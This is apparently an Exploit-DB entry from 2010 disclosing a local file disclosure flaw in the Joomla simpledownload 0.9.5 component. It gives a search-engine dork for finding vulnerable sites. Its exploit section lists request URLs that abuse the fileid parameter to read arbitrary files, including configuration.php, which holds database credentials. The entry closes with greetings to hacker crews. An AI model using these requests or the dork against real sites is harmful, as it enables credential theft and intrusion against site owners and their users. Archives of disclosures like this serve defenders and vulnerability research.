Joomla! Component simpledownload 0.9.5 - Local File Disclosure

EDB-ID:

12623


Author:

ALTBTA

Type:

webapps


Platform:

PHP

Date:

2010-05-16


[!]==========================================[!]

[~] Joomla Component simpledownload Remote File Disclouse
[~] Author : altbta (l_9@hotmail.com)
[~] Homepage : [ v4-team.com ] & [ xp10.me ]
[~] Date : 16 Mei, 2010

[!]==========================================[!]

[ Software Information ]

[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : Remote File Disclouse
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected

[!]==========================================[!]

===[ Exploit ]===

http://site/index.php?option=com_simpledownload&task=download&fileid=[file]
http://site/index.php?option=com_simpledownload&task=download&fileid=/configuration.php

[!]=========~~{  altbta }~~=========[!]

RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & ابو الجازي & اورنج مان